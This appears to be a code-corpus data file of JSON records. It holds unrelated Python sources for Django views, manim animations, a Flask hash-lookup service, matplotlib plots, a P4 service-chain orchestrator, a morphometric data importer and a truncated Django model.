return HttpResponse(\"Failed\")\n","sub_path":"jacquard_django/drawingSearchApp/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":12800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"373025857","text":"from app import run_app\nfrom argparse import ArgumentParser\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n\n parser.add_argument('-p', '--port', type=int, help='set the port the web app will run on')\n parser.add_argument('-d', '--debug', action='store_true', help='set the web app to run in debug mode')\n\n args = parser.parse_args()\n\n run_app(args.__dict__)","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"581304191","text":"import numpy as np\nimport itertools as it\nimport inspect\nimport copy\nimport warnings\n\nfrom animation import Animation\nfrom mobject import Mobject, Point\nfrom constants import *\nfrom helpers import *\n\ndef straight_path(start_points, end_points, alpha):\n return (1-alpha)*start_points + alpha*end_points\n\ndef semi_circular_path(start_points, end_points, alpha, axis):\n midpoints = (start_points + end_points) / 2\n angle = alpha * np.pi\n rot_matrix = rotation_matrix(angle, axis)[:2, :2]\n result = np.zeros(start_points.shape)\n result[:,:2] = np.dot(\n (start_points - midpoints)[:,:2], \n np.transpose(rot_matrix)\n ) + midpoints[:,:2]\n result[:,2] = (1-alpha)*start_points[:,2] + alpha*end_points[:,2]\n return result\n\ndef clockwise_path(start_points, end_points, alpha):\n return semi_circular_path(start_points, end_points, alpha, IN)\n\ndef counterclockwise_path(start_points, end_points, alpha):\n return semi_circular_path(start_points, end_points, alpha, OUT)\n\nclass Transform(Animation):\n def __init__(self, mobject1, mobject2, \n run_time = DEFAULT_TRANSFORM_RUN_TIME,\n interpolation_function = straight_path,\n black_out_extra_points = False,\n *args, **kwargs):\n self.interpolation_function = interpolation_function\n count1, count2 = mobject1.get_num_points(), mobject2.get_num_points()\n if count2 == 0:\n mobject2 = Point((SPACE_WIDTH, SPACE_HEIGHT, 0))\n count2 = mobject2.get_num_points()\n Mobject.align_data(mobject1, mobject2)\n Animation.__init__(self, mobject1, run_time = run_time, *args, **kwargs)\n self.ending_mobject = mobject2\n self.mobject.SHOULD_BUFF_POINTS = \\\n mobject1.SHOULD_BUFF_POINTS and mobject2.SHOULD_BUFF_POINTS\n self.reference_mobjects.append(mobject2)\n self.name += \"To\" + str(mobject2)\n\n if black_out_extra_points and count2 < count1:\n #Ensure redundant pixels fade to black\n indices = np.arange(\n 0, count1-1, float(count1) / count2\n ).astype('int')\n temp = np.zeros(mobject2.points.shape)\n temp[indices] = mobject2.rgbs[indices]\n mobject2.rgbs = temp\n self.non_redundant_m2_indices = indices\n\n def update_mobject(self, alpha):\n self.mobject.points = self.interpolation_function(\n self.starting_mobject.points,\n self.ending_mobject.points,\n alpha\n )\n self.mobject.rgbs = straight_path(\n self.starting_mobject.rgbs,\n self.ending_mobject.rgbs,\n alpha\n )\n\n def clean_up(self):\n Animation.clean_up(self)\n if hasattr(self, \"non_redundant_m2_indices\"):\n #Reduce mobject (which has become identical to mobject2), as\n #well as mobject2 itself\n for mobject in [self.mobject, self.ending_mobject]:\n for attr in ['points', 'rgbs']:\n setattr(\n mobject, attr, \n getattr(\n self.ending_mobject, \n attr\n )[self.non_redundant_m2_indices]\n )\n\nclass ClockwiseTransform(Transform):\n def __init__(self, mobject1, mobject2, **kwargs):\n Transform.__init__(\n self, mobject1, mobject2, \n interpolation_function = clockwise_path, **kwargs\n )\n\nclass CounterclockwiseTransform(Transform):\n def __init__(self, mobject1, mobject2, **kwargs):\n Transform.__init__(\n self, mobject1, mobject2, \n interpolation_function = counterclockwise_path, **kwargs\n )\n\nclass FadeToColor(Transform):\n def __init__(self, mobject, color, *args, **kwargs):\n target = copy.deepcopy(mobject).highlight(color)\n Transform.__init__(self, mobject, target, *args, **kwargs)\n\nclass Highlight(FadeToColor):\n def __init__(self, mobject, color = \"red\",\n run_time = DEFAULT_ANIMATION_RUN_TIME, \n alpha_func = there_and_back, *args, **kwargs):\n FadeToColor.__init__(\n self, mobject, color, \n run_time = run_time, \n alpha_func = alpha_func, \n *args, **kwargs\n )\n\nclass ScaleInPlace(Transform):\n def __init__(self, mobject, scale_factor, *args, **kwargs):\n target = copy.deepcopy(mobject)\n center = mobject.get_center()\n target.shift(-center).scale(scale_factor).shift(center)\n Transform.__init__(self, mobject, target, *args, **kwargs)\n\nclass ApplyMethod(Transform):\n def __init__(self, method, *args, **kwargs):\n \"\"\"\n Method is a method of Mobject. *args is for the method,\n **kwargs is for the transform itself.\n\n Relies on the fact that mobject methods return the mobject\n \"\"\"\n if not inspect.ismethod(method) or \\\n not isinstance(method.im_self, Mobject):\n raise \"Not a valid Mobject method\"\n Transform.__init__(\n self,\n method.im_self,\n copy.deepcopy(method)(*args),\n **kwargs\n )\n\nclass ApplyFunction(Transform):\n def __init__(self, function, mobject, **kwargs):\n Transform.__init__(\n self, \n mobject, \n function(copy.deepcopy(mobject)),\n **kwargs\n )\n self.name = \"ApplyFunctionTo\"+str(mobject)\n\n\nclass ApplyPointwiseFunction(Transform):\n def __init__(self, function, mobject, \n run_time = DEFAULT_ANIMATION_RUN_TIME, **kwargs):\n map_image = copy.deepcopy(mobject)\n map_image.points = np.array(map(function, map_image.points))\n Transform.__init__(\n self, mobject, map_image, \n run_time = run_time, **kwargs\n )\n self.name = \"\".join([\n \"Apply\",\n \"\".join([s.capitalize() for s in function.__name__.split(\"_\")]),\n \"To\" + str(mobject)\n ])\n\nclass ComplexFunction(ApplyPointwiseFunction):\n def __init__(self, function, *args, **kwargs):\n def point_map(point):\n x, y, z = point\n c = np.complex(x, y)\n c = function(c)\n return c.real, c.imag, z\n if len(args) > 0:\n args = list(args)\n mobject = args.pop(0)\n elif \"mobject\" in kwargs:\n mobject = kwargs.pop(\"mobject\")\n else:\n mobject = Grid()\n ApplyPointwiseFunction.__init__(self, point_map, mobject, *args, **kwargs)\n self.name = \"ComplexFunction\" + to_cammel_case(function.__name__)\n #Todo, abstract away function naming'\n\n\nclass TransformAnimations(Transform):\n def __init__(self, start_anim, end_anim, \n alpha_func = squish_alpha_func(smooth),\n **kwargs):\n if \"run_time\" in kwargs:\n run_time = kwargs.pop(\"run_time\")\n for anim in start_anim, end_anim:\n anim.set_run_time(run_time)\n self.start_anim, self.end_anim = start_anim, end_anim\n Transform.__init__(\n self,\n start_anim.mobject,\n end_anim.mobject,\n run_time = max(start_anim.run_time, end_anim.run_time),\n alpha_func = alpha_func,\n **kwargs\n )\n #Rewire starting and ending mobjects\n start_anim.mobject = self.starting_mobject\n end_anim.mobject = self.ending_mobject\n\n def update(self, alpha):\n self.start_anim.update(alpha)\n self.end_anim.update(alpha)\n Transform.update(self, alpha)\n\n\n\n\n\n","sub_path":"animation/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":7664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"10324353","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom flask import Flask, request, jsonify\n\nfrom sanejs.query import Query\n\napp = Flask(__name__)\n\nq = Query()\n\n\n@app.route('/', methods=['POST', 'HEAD'])\ndef sha512():\n if request.method == 'HEAD':\n # Just returns ack if the webserver is running\n return 'Ack'\n try:\n req_data = request.get_json(force=True)\n except Exception as e:\n return jsonify({'error': e})\n\n if not req_data.get('sha512'):\n return jsonify({'error': 'The key \"sha512\" is required.'})\n return jsonify(q.search_hash(req_data['sha512']))\n\n\n@app.route('/library', methods=['POST'])\ndef library():\n try:\n req_data = request.get_json(force=True)\n except Exception as e:\n return jsonify({'error': e})\n\n if not req_data.get('library'):\n return jsonify({'error': 'The key \"library\" is required.'})\n\n if 'version' in req_data:\n to_return = q.search_lib(req_data['library'], req_data['version'])\n else:\n to_return = q.search_lib(req_data['library'])\n\n return jsonify(to_return)\n","sub_path":"website/web/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"58707985","text":"import matplotlib.pyplot as plt\r\n\r\n# ******************Plot***********************************************\r\ny1 = [10, 13, 5, 40, 30, 60, 70, 12, 55, 25]\r\nx1 = range(0, 10)\r\nx2 = range(0, 9)\r\ny2 = [5, 8, 0, 30, 20, 40, 50, 10, 40]\r\nplt.figure(figsize=(12, 6))\r\nplt.plot(x1, y1, label='Frist line', linewidth=3, color='r', marker='o',\r\n markerfacecolor='blue', markersize=6)\r\nplt.plot(x2, y2, label='second line')\r\nplt.xlabel('Plot Number')\r\nplt.ylabel('Important var')\r\nplt.title('Interesting Graph\\nCheck it out')\r\nplt.legend()\r\nfig1 = plt.figure('fig1')\r\nplt.show()\r\n\r\n# *******************BAR************************\r\nfig2 = plt.figure('fig2')\r\ny1 = [10, 13, 5, 40, 30, 60, 70, 12, 55, 25]\r\nx1 = range(0, 20, 2)\r\nx2 = range(1, 21, 2)\r\ny2 = [5, 8, 0, 30, 20, 40, 50, 10, 40, 15]\r\nplt.bar(x1, y1, label='Frist line')\r\nplt.bar(x2,y2,label='second line',color='r')\r\nplt.xlabel('Plot Number')\r\nplt.ylabel('Important var')\r\nplt.title('Interesting Graph\\nCheck it out')\r\nplt.legend()\r\nplt.show()\r\n\r\n","sub_path":"8 usingMatplotlib/4yituduoxian.py","file_name":"4yituduoxian.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"537867702","text":"# -*- coding:utf-8 -*-\nfrom flask import Flask, request, jsonify\nimport requests\nimport json\nimport time\nimport os\nimport sys\n\n# Import P4Runtime lib from parent utils dir\n# Probably there's a better way of doing this.\nsys.path.append(\n os.path.join(os.path.dirname(os.path.abspath(__file__)),\n '../utils/'))\nimport const\n\n\ndef addr2dec(addr):\n \"将点分十进制IP地址转换成十进制整数\"\n items = [int(x) for x in addr.split(\".\")]\n return sum([items[i] << [24, 16, 8, 0][i] for i in range(4)])\n\n\ndef dec2addr(dec):\n \"将十进制整数IP转换成点分十进制的字符串IP地址\"\n return \".\".join([str(dec >> x & 0xff) for x in [24, 16, 8, 0]])\n\n\napp = Flask(__name__)\nchain_id = 0\nserver_addr = {\n \"s1\": \"http://10.149.252.25:8090\",\n \"s2\": \"http://10.149.252.26:8090\",\n \"s3\": \"http://10.149.252.27:8090\"\n}\nheaders = {\n 'Content-Type': 'application/json'\n}\nnf_offlodability = {\n \"Monitor\": const.OFFLOADABLE,\n \"Firewall\": const.OFFLOADABLE,\n \"IPRewriter\": const.PARTIAL_OFFLOADABLE\n}\n\n\ndef parse_chain(chain_desc):\n \"\"\"Parse user input chain\n assign id to each nf and group nf by location\n assgin offloadability to each nf\n \"\"\"\n global nf_offlodability\n nf_id = 0\n cur_location = None\n cur_group = None\n nf_groups = {}\n for nf in chain_desc:\n # assign id first\n nf['id'] = nf_id\n nf_id = nf_id + 1\n\n # assgin offloadability\n nf['offloadability'] = nf_offlodability[nf['name']]\n # group by location\n location = nf['location']\n if location == cur_location:\n cur_group.append(nf)\n else:\n if cur_location is not None:\n nf_groups[cur_location] = cur_group\n cur_location = location\n cur_group = [nf]\n\n nf_groups[cur_location] = cur_group\n return nf_groups\n\n\ndef parse_route(chain_route, nf_groups, chain_id, chain_length):\n route_infos = {}\n for switch in chain_route:\n if switch != \"egress\" and switch != \"ingress\":\n num_nfs = len(nf_groups.get(switch)) if nf_groups.get(\n switch) != None else 0\n chain_length = chain_length - num_nfs\n route_infos[switch] = {\n \"chain_id\": chain_id,\n \"chain_length\": chain_length,\n \"output_port\": 0 # 硬编码一下,本来应该根据拓扑决定\n }\n return route_infos\n\n\n\n@app.route('/test')\ndef test():\n return \"Hello from p4sfc ochestrator\\n\"\n\n\n@app.route('/deploy_chain', methods=['POST'])\ndef deploy_chain():\n receive_time = int(time.time()*1000)\n\n global chain_id\n global server_addr\n global headers\n\n data = request.get_json()\n chain_desc = data.get(\"chain_desc\")\n chain_length = len(chain_desc)\n nf_groups = parse_chain(chain_desc)\n\n for location, nfs in nf_groups.iteritems():\n url = server_addr[location] + \"/deploy_chain\"\n payload = {\n \"chain_id\": chain_id,\n \"chain_length\": chain_length,\n \"nfs\": nfs\n }\n chain_length = chain_length - len(nfs)\n requests.request(\"POST\", url, headers=headers,\n data=json.dumps(payload))\n\n chain_route = data.get(\"route\")\n chain_length = len(chain_desc)\n route_infos = parse_route(chain_route, nf_groups, chain_id, chain_length)\n complete_time = 0\n for switch, route_info in route_infos.iteritems():\n url = server_addr[switch] + \"/insert_route\"\n payload = {\n \"chain_id\": route_info[\"chain_id\"],\n \"chain_length\": route_info[\"chain_length\"],\n \"output_port\": route_info[\"output_port\"]\n }\n response = requests.request(\"POST\", url, headers=headers,\n data=json.dumps(payload))\n complete_time = max(int(response.text), complete_time)\n\n response_payload = {\n \"chain_id\": chain_id,\n \"receive_time\": receive_time,\n \"complete_time\": complete_time\n }\n\n chain_id = chain_id + 1\n return jsonify(response_payload)\n\n\n@app.route('/delete_chain', methods=['POST'])\ndef delete_chain():\n receive_time = int(time.time()*1000)\n global server_addr\n global headers\n data = request.get_json()\n chain_id = data.get(\"chain_id\")\n payload = {\n \"chain_id\": chain_id\n }\n complete_time = 0\n for location, addr in server_addr.iteritems():\n url = addr + \"/delete_chain\"\n response = requests.request(\"POST\", url, headers=headers,\n data=json.dumps(payload))\n complete_time = max(int(response.text), complete_time)\n\n response_payload = {\n \"receive_time\": receive_time,\n \"complete_time\": complete_time\n }\n\n return jsonify(response_payload)\n\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port='8091')\n {\n \"chain_desc\": [\n {\n \"name\": \"Monitor\",\n \"click_config\": {\n \"param1\": \"abc\"\n },\n \"location\": \"s1\"\n },\n {\n \"name\": \"Firewall\",\n \"click_config\": {\n \"param1\": \"abc\"\n },\n \"location\": \"s1\"\n },\n {\n \"name\": \"IPRewriter\",\n \"click_config\": {\n \"param1\": \"abc\"\n },\n \"location\": \"s1\"\n }\n ],\n \"route\": [\n \"ingress\",\n \"s1\",\n \"egress\"\n ]\n }\n","sub_path":"ochestrator/p4sfc_ochestrator.py","file_name":"p4sfc_ochestrator.py","file_ext":"py","file_size_in_byte":5577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"471472393","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\nimport re\nimport xlrd\n\nfrom libpy.modan_dbclass import MdObject, MdDataset, MdLandmark, MdPropertyName, MdProperty\n\nID_TAB_DELIMITED = 1\nID_ABERLINK = 2\n\nFILETYPE_TPS = 0\nFILETYPE_X1Y1 = 1\nFILETYPE_MORPHOLOGIKA = 2\nFILETYPE_EXCEL = 3\nFILETYPE_LIST = ['TPS', 'X1Y1CS', 'Morphologika', 'EXCEL']\nNEWLINE = \"\\n\"\nDEFAULT_DIMENSION = 2\n\n\nclass ModanDataImporter:\n def __init__(self, parent, type='', text='', list=[]):\n self.type = type\n self.parent = parent\n self.error_message = ''\n self.dimension = -1\n if text != '':\n self.set_grid_from_text(text)\n elif len(list) > 0:\n self.set_grid_from_list(list)\n\n def set_grid_from_list(self, list=[]):\n self.grid = list\n self.linenum = len(list)\n\n def set_grid_from_text(self, text=''):\n self.orig_text = text.rstrip().replace('\\r\\n', '\\n').replace('\\r', '\\n')\n self.title = ''\n self.lines = self.orig_text.split('\\n')\n self.linenum = len(self.lines)\n self.grid = []\n for i in xrange(self.linenum):\n self.grid.append(self.lines[i].split('\\t'))\n\n def openTpsFile(self, filepath):\n f = open(filepath, 'r')\n tpsdata = f.read()\n f.close()\n\n object_count = 0\n landmark_count = 0\n data = []\n threed = 0\n twod = 0\n objects = {}\n header = ''\n comment = ''\n image_count = 0\n tps_lines = [l.strip() for l in tpsdata.split(NEWLINE)]\n found = False\n for line in tps_lines:\n line = line.strip()\n if line == '':\n continue\n headerline = re.search('^(\\w+)(\\s*)=(\\s*)(\\d+)(.*)', line)\n if headerline == None:\n if header == 'lm':\n point = re.split('\\s+', line)\n if len(point) > 2 and self.isNumber(point[2]):\n threed += 1\n else:\n twod += 1\n\n if len(point)>1:\n data.append(point)\n continue\n elif headerline.group(1).lower() == \"lm\":\n if len(data) > 0:\n if comment != '':\n key = comment\n else:\n key = self.dataset_name + \"_\" + str(object_count + 1)\n objects[key] = data\n data = []\n header = 'lm'\n object_count += 1\n landmark_count, comment = int(headerline.group(4)), headerline.group(5).strip()\n # landmark_count_list.append( landmark_count )\n # if not found:\n #found = True\n elif headerline.group(1).lower() == \"image\":\n image_count += 1\n\n if len(data) > 0:\n if comment != '':\n key = comment\n else:\n key = self.dataset_name + \"_\" + str(object_count + 1)\n objects[key] = data\n data = []\n\n if object_count == 0 and landmark_count == 0:\n return False\n if threed > twod:\n self.dimension = 3\n else:\n self.dimension = 2\n\n self.object_count = object_count\n self.landmark_count = landmark_count\n self.data = objects\n\n return True\n\n def openExcelFile(self, filepath):\n ''' okay.. MS Excel file '''\n book = xlrd.open_workbook(filepath)\n object_count = 0\n sheet_list = book.sheets()\n data_list = []\n if len(sheet_list) == 1 or \\\n len(sheet_list) == 3 and ( sheet_list[1].nrows == 0 ) and (\n sheet_list[2].nrows == 0 ):\n ''' all the objects are in a single sheet '''\n object_count = -1\n row_list = []\n sheet = sheet_list[0]\n for r in range(sheet.nrows):\n row = sheet.row_values(r)\n data_list.append(row)\n else:\n for sheet in sheet_list:\n if sheet.nrows > 0 and sheet.name[0] != '#':\n object_count = object_count + 1\n data_list.append(sheet)\n # data_list = sheet_list\n self.object_count = object_count\n self.landmark_count = -1\n self.data = data_list\n return True\n\n def openTextFile(self, filepath):\n f = open(filepath, 'r')\n data = f.read()\n f.close()\n\n return False\n\n def openMorphologikaFile(self, filepath):\n f = open(filepath, 'r')\n morphologika_data = f.read()\n f.close()\n\n object_count = -1\n landmark_count = -1\n data_lines = [l.strip() for l in morphologika_data.split(NEWLINE)]\n found = False\n dsl = ''\n dimension = DEFAULT_DIMENSION\n data = {}\n for line in data_lines:\n line = line.strip()\n if line == \"\":\n continue\n if line[0] == \"'\":\n '''comment'''\n continue\n elif line[0] == '[':\n dsl = re.search('(\\w+)', line).group(0).lower()\n data[dsl] = []\n continue\n else:\n data[dsl].append(line)\n if dsl == 'individuals':\n object_count = int(line)\n if dsl == 'landmarks':\n landmark_count = int(line)\n if dsl == 'dimensions':\n dimension = int(line)\n\n if object_count < 0 or landmark_count < 0:\n return False\n\n self.object_count = object_count\n self.landmark_count = landmark_count\n self.dimension = dimension\n self.data = data\n return True\n\n def checkFileType(self, filepath, filetype=FILETYPE_TPS):\n ( pathname, filename ) = os.path.split(filepath)\n ( filename, fileext ) = os.path.splitext(filename)\n fileext = fileext.lower()\n self.dataset_name = filename\n\n success = False\n\n ''' file type specified when opening '''\n if filetype == FILETYPE_EXCEL:\n success = self.openExcelFile(filepath)\n self.filetype = filetype\n elif filetype == FILETYPE_TPS:\n success = self.openTpsFile(filepath)\n self.filetype = filetype\n elif filetype == FILETYPE_MORPHOLOGIKA:\n success = self.openMorphologikaFile(filepath)\n self.filetype = filetype\n\n ''' second chance! file type not specified '''\n if ( not success ):\n print( \"not success\")\n if fileext == '.tps':\n print( \"try tps\")\n success = self.openTpsFile(filepath)\n if success:\n self.filetype = FILETYPE_TPS\n return success\n elif fileext == '.xls':\n success = self.openExcelFile(filepath)\n if success:\n self.filetype = FILETYPE_EXCEL\n else: # if fileext == '.txt':\n print( \"try morphologika\")\n ''' try morphologika first '''\n success = self.openMorphologikaFile(filepath)\n if success:\n self.filetype = FILETYPE_MORPHOLOGIKA\n else:\n print( \"try tps\")\n ''' and then tps'''\n success = self.openTpsFile(filepath)\n if success:\n self.filetype = FILETYPE_TPS\n else:\n ''' add text file open later'''\n pass\n return success\n\n def ImportDataset(self, session, dimension=3):\n ''' don't forget to implement transaction for this method '''\n\n ''' first, insert the dataset '''\n if self.dimension < 0:\n self.dimension = dimension\n\n ds = MdDataset()\n ds.dsname = self.dataset_name\n ds.dimension = self.dimension\n\n dsname = newname = self.dataset_name\n i = 1\n len( session.query(MdDataset).filter(MdDataset.dsname==newname).all() ) > 0\n while len( session.query(MdDataset).filter(MdDataset.dsname==newname).all() ) > 0:\n newname = dsname + \" (\" + str(i) + \")\"\n i += 1\n ds.dsname = newname\n session.add(ds)\n\n ''' and then objects and landmarks '''\n if self.filetype == FILETYPE_TPS:\n self.importTpsFile(ds,session)\n elif self.filetype == FILETYPE_MORPHOLOGIKA:\n self.importMorphologikaFile(ds,session)\n elif self.filetype == FILETYPE_EXCEL:\n self.importExcelFile(ds,session)\n # elif self.filetype == FILETYPE_TEXT:\n # pass\n return\n\n def importMorphologikaFile(self, dataset, session):\n i = 0\n # abc\n for name in self.data['names']:\n obj = MdObject()\n obj.objname = name\n obj.landmark_list = []\n j = 1\n begin = i * self.landmark_count\n count = self.landmark_count\n # print begin, begin + count\n for point in self.data['rawpoints'][begin:begin + count]:\n #print point\n coords = re.split('\\s+', point)\n obj.landmark_list.append(MdLandmark(coords))\n obj.pack_landmark()\n j += 1\n dataset.object_list.append(obj)\n i += 1\n\n group_info = []\n group_number = []\n edge_list = []\n polygon_list = []\n propertyname_list = []\n property_list_list = []\n\n if 'labels' in self.data.keys():\n for line in self.data['labels']:\n labels = re.split('\\s+', line)\n for label in labels:\n propertyname_list.append( label )\n dataset.propertyname_list.append(MdPropertyName(label))\n\n # flush session to get dataset id and mdpropertyname ids\n session.flush()\n\n if 'labelvalues' in self.data.keys():\n for line in self.data['labelvalues']:\n property_list = re.split('\\s+', line)\n property_list_list.append(property_list)\n\n if 'wireframe' in self.data.keys():\n for line in self.data['wireframe']:\n edge = [int(v) for v in re.split('\\s+', line)]\n edge.sort()\n edge_list.append(edge)\n\n if 'polygons' in self.data.keys():\n for line in self.data['polygons']:\n poly = [int(v) for v in re.split('\\s+', line)]\n poly.sort()\n polygon_list.append(poly)\n\n '''a\n print \"n o o\", self.object_count\n print \"n o lm\", self.landmark_count\n print \"dim\", dataset.dimension\n print \"groups\", group_info, group_number\n #print \"names\", object_name\n #print \"groupname_list\", groupname_list\n #print \"groupinfo_list\", groupinfo_list\n #print \"object_list\", raw_object_list\n print \"wireframe\", edge_list\n print \"polygons\", polygon_list\n a'''\n\n ''' Error checking and warning '''\n if len(dataset.object_list) == 0:\n print( \"no objects!\")\n if len(dataset.object_list) != self.object_count:\n print( 'number of objects does not match!! %d objects expected, but %d objects found' % (\n self.object_count, len(dataset.object_list) ))\n\n if len( property_list_list ) >0:\n i = 0\n for obj in dataset.object_list:\n\n for j in range(len(property_list_list[i])):\n mdprop = MdProperty(property_list_list[i][j])\n mdprop.object_id = obj.id\n mdprop.propertyname_id = dataset.propertyname_list[j].id\n obj.property_list.append(mdprop)\n obj.dataset_id = dataset.id\n #print object.id\n i += 1\n #percentage = ( float( processed_object ) / float ( self.objectcount) ) * 100\n percentage = ( float(i) / float(self.object_count) ) * 100\n self.parent.SetProgress(int(percentage))\n #print group_info\n edge_list.sort()\n dataset.edge_list = edge_list\n dataset.pack_wireframe()\n polygon_list.sort()\n dataset.polygon_list = polygon_list\n dataset.pack_polygons()\n return\n\n def importTpsFile(self, dataset, session):\n for name in self.data.keys():\n obj = MdObject()\n obj.objname = name\n obj.landmark_list = []\n for point in self.data[name]:\n coords = point\n # print point\n if len(coords)>0:\n lm = MdLandmark(coords)\n obj.landmark_list.append(lm)\n obj.pack_landmark()\n dataset.object_list.append( obj )\n\n def checkExcelSheet(self, sheet):\n new_objects = []\n for row in sheet.rows:\n pass\n return new_objects\n\n def ExcelSheetToMdObject(self, sheet, dataset):\n sheetdata = []\n for r in range(sheet.nrows):\n sheetdata.append(sheet.row_values(r))\n self.set_grid_from_list(sheetdata)\n self.checkDataType()\n mo = MdObject()\n mo.objname = sheet.name\n mo.objdesc = ''\n mo.landmark_list = []\n for lm in self.grid:\n mo.landmark_list.append(MdLandmark(lm))\n dataset.object_list.append(mo)\n return\n\n def importExcelFile(self, dataset, session):\n # TODO : test Excel file import\n for sheet in self.data:\n self.ExcelSheetToMdObject(sheet, dataset)\n # for obj in converted_objects:\n # objects.append( obj )\n\n def checkDataType(self):\n row_to_check = 5\n min_colnum = 2\n\n if ( self.linenum > row_to_check ):\n row_to_check = row_to_check\n else:\n row_to_check = self.linenum\n print( \"row to check\", row_to_check)\n print( \"linenum\", self.linenum)\n threshold = row_to_check * 0.8\n\n if ( row_to_check > 2 ):\n mode_point = 0\n # dim_point = 0\n # prev_colnum = 0\n max_colnum = 10\n colnum = 0\n cols = []\n colIsNumber = []\n #mode = ''\n coord_begin = 0\n coord_end = 0\n aberlink_point = 0\n\n # Check location of the numbers\n for j in xrange(max_colnum):\n colIsNumber.append(0)\n for i in xrange(row_to_check):\n firstcol = unicode(self.grid[i][0])\n if ( firstcol == u'R' or firstcol == 'F' or firstcol == 'P' ):\n aberlink_point += 1\n colnum = len(self.grid[i])\n if ( colnum > min_colnum ):\n mode_point += 1\n if ( colnum > max_colnum ):\n colnum = max_colnum\n for j in xrange(colnum):\n #print \"i:\"+str(i)\n #print \"j:\"+str(j)\n #print self.grid[i][j]\n if ( self.grid[i][j] != '' and self.isNumber(self.grid[i][j]) ):\n colIsNumber[j] += 1\n if ( mode_point >= threshold ):\n mode = ID_TAB_DELIMITED\n if ( aberlink_point >= threshold ):\n mode = ID_ABERLINK\n else:\n mode = ID_TAB_DELIMITED\n for i in xrange(colnum - 1):\n if ( colIsNumber[i] < threshold and colIsNumber[i + 1] >= threshold ):\n coord_begin = i + 1\n if ( colIsNumber[i + 1] >= threshold ):\n coord_end = i + 1\n # set 3 as maximum column numbers\n if ( coord_end - coord_begin > 2 ):\n coord_end = coord_begin + 2\n datacol_count = coord_end - coord_begin + 1\n print( \"begin:[%d]\" % coord_begin)\n print( \"end:[%d]\" % coord_end)\n if (coord_begin > 0 ):\n self.title = self.grid[0][0]\n\n # check if from Aberlink\n # if from aberlink, strip first and last row\n print( self.grid[0][0], self.grid[1][0], self.grid[2][0])\n if ( unicode(self.grid[0][0]) == u'R' and\n ( unicode(self.grid[1][0]) == u'R' or unicode(self.grid[1][0]) == u'F' ) and\n unicode(self.grid[2][0]) == u'P' ):\n print( \"delete first row\")\n del self.grid[0]\n last_row = len(self.grid) - 1\n #print self.grid[last_row]\n if ( ( unicode(self.grid[last_row - 2][0]) == u'R' or unicode(self.grid[last_row - 2][0]) == u'F' ) and\n unicode(self.grid[last_row - 1][0]) == u'P' and\n unicode(self.grid[last_row][0]) == u'R' ): #and\n #float( self.grid[last_row][1] ) == 0.0 and\n #float( self.grid[last_row][2] ) == 0.0 and\n #float( self.grid[last_row][3] ) == 0.0 ):\n #print 'last row del'\n del self.grid[len(self.grid) - 1]\n print( \"delete last row\")\n\n #print len( self.grid )\n max_row = len(self.grid)\n #half_max_row = int( max_row / 2 )\n #print max_row\n #print half_max_row\n if ( mode == ID_ABERLINK ):\n for i in xrange(max_row / 2):\n #print i\n j = max_row - 2 * i\n #print j\n del self.grid[max_row - 2 * i - 1]\n\n for cols in ( self.grid ):\n for i in xrange(datacol_count):\n cols[i] = cols[coord_begin + i]\n cols[i + 1:len(cols)] = []\n # pass\n # print self.title\n #print self.grid\n\n def isNumber(self, s):\n try:\n float(s)\n return True\n except ValueError:\n return False\n\n\n# text = \"this is title\\t1\\t1\\t1\\n\"\n# text += \"\\t1\\t1\\t2\\n\"\n#text += \"\\t1\\t1\\t3\\n\"\n#text += \"\\t1\\t1\\t4\\n\"\n#text += \"\\t2\\t3\\t4\\n\"\n#text += \"\\t22\\t33\\t44\"\n#di = ModanDataImporter(text=text)\n#di.checkDataType()\n","sub_path":"libpy/dataimporter.py","file_name":"dataimporter.py","file_ext":"py","file_size_in_byte":18389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"524645812","text":"\"\"\"Model classes for sources.\"\"\"\n\nimport logging\nimport re\nfrom typing import TYPE_CHECKING, Dict, List, Optional, Sequence, Union\n\nfrom django.core.exceptions import ObjectDoesNotExist, ValidationError\nfrom django.db import models\nfrom django.utils.html import format_html\nfrom django.utils.safestring import SafeString\nfrom django.utils.translation import ugettext_lazy as _\nfrom gm2m import GM2MField as GenericManyToManyField\nfrom polymorphic.models import PolymorphicModel\n\nfrom apps.entities.models.model_with_related_entities import ModelWithRelatedEntities\nfrom apps.search.models import SearchableDatedModel\nfrom apps.sources.manager import PolymorphicSourceManager, PolymorphicSourceQuerySet\nfrom apps.sources.models.source_file import SourceFile\nfrom apps.sources.serializers import SourceSerializer\nfrom core.fields import HistoricDateTimeField, HTMLField\nfrom core.models import retrieve_or_compute\nfrom core.structures.historic_datetime import HistoricDateTime\nfrom core.utils.html import NEW_TAB, components_to_html, compose_link, soupify\nfrom core.utils.string import fix_comma_positions\n\nif TYPE_CHECKING:\n from apps.entities.models import Entity\n from apps.sources.models.source_containment import SourceContainment\n\nMAX_CITATION_STRING_LENGTH: int = 500\nMAX_CITATION_HTML_LENGTH: int = 1000\nMAX_URL_LENGTH: int = 100\nMAX_ATTRIBUTEE_HTML_LENGTH: int = 300\nMAX_ATTRIBUTEE_STRING_LENGTH: int = 100\nMAX_TITLE_LENGTH: int = 250\n\nCOMPONENT_DELIMITER = ', '\n\nSOURCE_TYPES = (('P', 'Primary'), ('S', 'Secondary'), ('T', 'Tertiary'))\n\nCITATION_PHRASE_OPTIONS = (\n (None, ''),\n ('quoted in', 'quoted in'),\n ('cited in', 'cited in'),\n)\n\n\nclass Source(PolymorphicModel, SearchableDatedModel, 